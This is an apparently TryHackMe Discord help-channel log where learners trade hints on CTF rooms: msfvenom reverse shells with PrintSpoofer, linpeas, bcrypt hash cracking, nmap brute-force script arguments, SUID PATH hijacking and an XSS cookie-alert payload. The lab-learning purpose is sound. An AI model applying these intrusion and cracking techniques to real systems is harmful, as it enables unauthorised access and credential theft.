Also Yes, the room creator is TheCyb3rW0lf
Go and watch for ||Internal|| things
VulnNet: Internal is? Ok, that's what I was trying to figure out. Thanks.
Gave +1 Rep to @potent quail
Could someone give me a hint or tell me what I'm doing wrong on RA2? I got the first two flags, but having lots of trouble for flag3. I was able to successfully download the PrintSpoofer exploit onto my attackbox, create a shell.exe with msfvenom, and using an http.server and Invoke-WebRequest to move them onto the Windows machine. I use nlwrap to listen on the port the reverse shell was created for, and I run the printspoofer exploit on the windows machine with the -c shell.exe argument. It picks up the connection, but no command prompt opens
have screenshots to show
@potent quail you can do it without exploit
What do you mean @agile jewel - you have to exploit something to get better privs lol. If you mean without THE exploit, I know. I just wanted to confirm with the room creator, which I’ve now done.
Hi, I'm already connected to the Internal (VulnNet Internal) server via ssh. I couldn't access the root user. I tried some different techniques but I failed. :/ Can I take any hint? #VulnNet: Internal
Can anyone help with the XSS room - Q3: Create an alert pop box that appears on page with document cookie. Why is <script>alert(document.cookie)<.scritp> a wrong answer when it executes fine in lab but the Answer box says incorrect?
typo in the closing part of the html tags, possibly
can anyone give a nudge on luniz ctf? the bcrypt cracking part, as john isn't working
I haven't done that room, sorry
keep enumerating the box
I don't have permission to go in the home directories where the flags most likely are
there is a /proct/pass/bcrypt.py script
it has a hash
and thats where I am stuck
I know about that, keep enumerating the box regardless, run your scans again
do you have a shell? linpeas run locally so you just ran it on your own box, not the target
I have
a shell
using the command executor, I got the nc revshell
I uploaded the linpeas after stabilizing the shell
@lofty girder
there's more than one path to root
Any Hint for wreath
I think wreath is a walkthrough with included instructions
anything in particular you are struggling with you can ask in #wreath-network however
Is anyone able to help me with the 'crackthehash' room? I'm having real problems with Task 1 Q4 where the hint says "it's not bcrypt". I have tried every algorithm I can find and no dice. I think I've identified it as ||wbb3|| but hashcat and john don't appear to like it. I considered that the password might not be in rockyou but I can't find any online crackers that can do it either.
Please help me discord users, you're my only hope.
@brittle marten Search the first three digits of the hash i.e. $2y$ and see what comes up.
Oh so perhaps I was right originally and I should have just left hashcat going.
When it estimated over a day to crack I assumed I'd got it wrong
is far below rockyou's list...
OK, so would you recommend I use hashcat and GPU or john and CPU to crack it?
I think the time estimated is based on the hashcat ability to try every word's hash value with the hash you want to crack.
I've read about how this particular type of hash negates the benefits of the GPU. But I've just bought a brand new GPU and this is the first THM hash that wasn't cracked instantly 😆
Personally, I would recommend you to install hashcat in your windows and crack hashes with Hashcat and GPU.
OK, that's exactly how I'm running it. Thanks.
Welcome!
hashid if I remember correctly does ID the hash
Yeah but the hint told me explicitly that this was wrong.
It's good to know at least that I had done everything right.
Hint says: Try some other formats that start with the letter b
The correct hash does start with b. 🙂
Ha ha, that is true. But it definitely reads as though ||bcrypt|| is not the right algorithm.
well therein lies the trick lol
Now I'm back to being confused. I tried every other algorithm starting with a b to no success.
for reference's sake I think THM CTFs won't expect you to crack a hash for more than 5 minutes on a standard gpu
if the challenge involves hash cracking
Yeah that was my thinking.
so what options did you get from hashid
So now I'm back to thinking that ||bcrypt|| is wrong but I have no idea what to do.
One second, let me run it again. Definitely bcrypt and wbb3
Oh, and blowfish
which appears to be the same as bcrypt
ignore what it appears to be
they have the same code in hashcat
hey so I have a doubt, it's from network services 2 and it's sort of off topic or an alternative to the given method and I tried to do it, so I want to understand. As it says the alternative method using nmap --script=mysql-enum target, how do I check the arguments for the script and if I want to send the username and password, task 9
^^ I am also interested in this. I decided to give up and come back to it later.
next time just in case it is always a good idea to check the hash in https://hashes.com/en/tools/hash_identifier
Which task? Also, please be more specific.
Oh task 9
task 9 and from network services 2
so this method is given as the alternative method
Thanks. Used that too. Everything is telling me the same thing, but I still feel the hint is misleading.
Gave +1 Rep to @brave vale
I'll teach you in a way you can know for every future question about nmap scripting, but basically just do man nmap and read the section about scripts
or check the website from nmap specifically for the script I guess whatever you find easier
I did and I didn't understand hehe
what didn't you understand?
I checked it, there are args for brute username and password and I want to use that
how to pass args and if i have to check the args for a particular script
use --script-args
and I am very basic at nmap so I wanted to try this out to understand
yeah I'm trying to show you a method that will always be useful
because just telling you how to work it out in this one instance I feel won't stick
and pass the args brute.password=password, brute.username=root like this
@bold lichen Your question is perfect with the article here: https://pentestlab.blog/2013/04/21/pen-testing-sql-servers-with-nmap/
the nmap command I use when I want to find more about a script is --script-help <scriptname>
which, is in the man page for nmap
if you need information about an nmap script you can use --script-help or check the website
@bold lichen
As I told you, research is something you need to adapt to.
You will not find everything in 1-2 searches. Keep digging and connect the dots together. You will get it.
but I have the script name
alright
the thing is I am not sure how to use the args
nmap --script-help <scriptname> | this already assumes you know the script name which is why I put it in <> brackets
take a moment to read the following, so that you can go deeper into this https://nmap.org/book/nse-usage.html
oh my bad, okay thanks a lot
Gave +1 Rep to @silver otter
yep I am reading the one hackster sent me
if I have a doubt I will message you all
thanks
thanks
np gl!
Anytime.
so I read the article and even the one page by @brave vale
the thing is
one sec, I might be able to explain my doubt with the doc
so this is the args page for mysql-enum right, so I have to use --script-args and what do I type next
nmap -p 3306 <ip> --script mysql-query --script-args='query="<query>"[,username=<username>,password=<password>]'
okay, query=query?
Yea, query can be something like SELECT host, user FROM mysql.user
guys how to join vc, I can't join any vc
nmap -p 3306 <ip> --script mysql-enum --script-args=mysql-enum.userdb [username=<username>]
I am getting an error
I am not quite sure, but we can try. Let's continue this in private chat. Shall we? @bold lichen
You need to verify
Also, the script name is mysql-enum @bold lichen
!docs verify
ok thank you
follow the instructions
ok
failed to resolve the passdb though, I have no clue about the argument, it hasn't clearly mentioned what it's supposed to be used for
but thanks i understood the main part
Gave +1 Rep to @halcyon sequoia
How is lazyadmin for beginners ?
@bold lichen It's a good CTF. Beginner Friendly!
alright thanks
Thanks for the help. It turns out it only took 20 mins to crack so I should have just left it running.
Gave +1 Rep to @silver otter
glad you got there, surprising it took 20 mins but yeah
is it alright to watch a video and learn about it
I'll recommend trying yourself first. Else it is completely up to you.
just starting up brainstorm
@silver otter so still the same problem
I used
sudo nmap -sC -sV 10.10.138.143
still saying no to ping requests
does the command still run or just end?
just ends
sudo should make it auto not worry about that
it's a windows machine..
okay
lol no, I'm connected for sure cos I was just doing gatekeeper
well make sure target ip is right
yep confirmed
I copied straight from thm
sudo nmap -sS -sV -sC 10.10.138.143
same result
can send screens if that helps
sure
it's not letting me send screens on this server?
just have to add -Pn
I can confirm nmap -Pn 10.10.13x.14x completed in like 1 minute
and got what I needed for the room
though I apparently need to fix my nmap knowledge because I thought -sS also ignored pings
yeah you're right
mine worked too
I think it was scanning all ports which made it slow
esp with -Pn
awesome
thanks a lot @silver otter
Gave +1 Rep to @silver otter
really appreciate the help
np
hey! bit stuck on Ice room, specifically Task 4 Escalate - I have identified the exploit to be run but I am getting an OptionValidateError when I run it, that means the exploit completes but no session is created - any idea what's gone wrong? 😦
any hints for privesc on Overpass 1? I believe I'm supposed to be exploiting the ||crontab job|| but I'm not sure how to approach it.
@radiant badge Did you see the ||cronjob?||
It's a combination of that and something else
Something else linpeas should be able to pick out
hmm I see, okay I'll run linpeas again. thanks!
At last, Room belongs to James. 🙂
yep saw it while searching for previous mentions of overpass in the discord lol. loving the room so far 👌
Hey, @stuck fractal.
Posting straight flags for the rooms in a write-up is not under the rules I guess.
Is there any way that those write-ups can be taken down?
Alright!
I first tried to do lazy admin, I was thrashed, then I tried simple ctf
I was thrashed again
now I am sticking to my basic route
keep going with it, you will get there!
it's tough starting out, there is a LOT of information and it seems so big
Ya but I got a bit of idea
That enumeration and then checking stuff, even learnt you can check vulns using nmap and about gobuster, but still I feel I lack a lot so I will continue this once I at least complete the basic guide of them
Thm
some basics getting started, nmap -sV (enumerates versions), sC (default scripts, can get a bit more info), and save the output so you have it as a reference (oN will be a text file that looks like normal nmap output).
gobuster, a lot of people just use it to find directories (gobuster dir) but if you add to the end of the command -x php,html,txt it does take longer but it can pick up a lot of files you might otherwise not see
Ya thm has a gobuster section right M
?
@silver otter so I'm attempting gatekeeper
when I transfer to the windows machine to use with immunity
it's saying VCRUNTIME140.dll is missing?
I don't think the file got mangled during transfer, I've checked file size etc
alright no issue, I will check out some youtube video
I found it but I thought it was a directory ffs, I kept trying to cd into it 🤦♂️ had to read a writeup to figure out it was actually a text file. anyway great room dude. looking forward to doing Overpass 2 and 3
Good luck
need some hint for privesc in archangel... I know about the ||backup|| file with ||SUID bit set|| and also saw the inaccessible path using strings but not sure how to exploit it
I can't create a new directory... neither am I able to export a function with the same path name
If I remember correctly, the key here is that the ||backup|| calls a binary without specifying the full path
Check the PATH variable to see if it contains any directories that you can write to
okayyy... will check it again
Deleting the rest because you're posting flags
oh sorry
Strings :: Challenge 2
is the exact same question
same answer doesn't work
but 1:1 same question
different file
mb
this made me learn regex, never thought regex would be this useful
takes a hand to learn but once you got it, will save so much time damn
hi! I'm new in the cyber sec world and really interested in OSINT. I've tried everything to find the SSID in the OhSINT room but... I'm lost, can I have a hint?
P.S. sorry if my english is bad (I'm French!)
Room, task, question?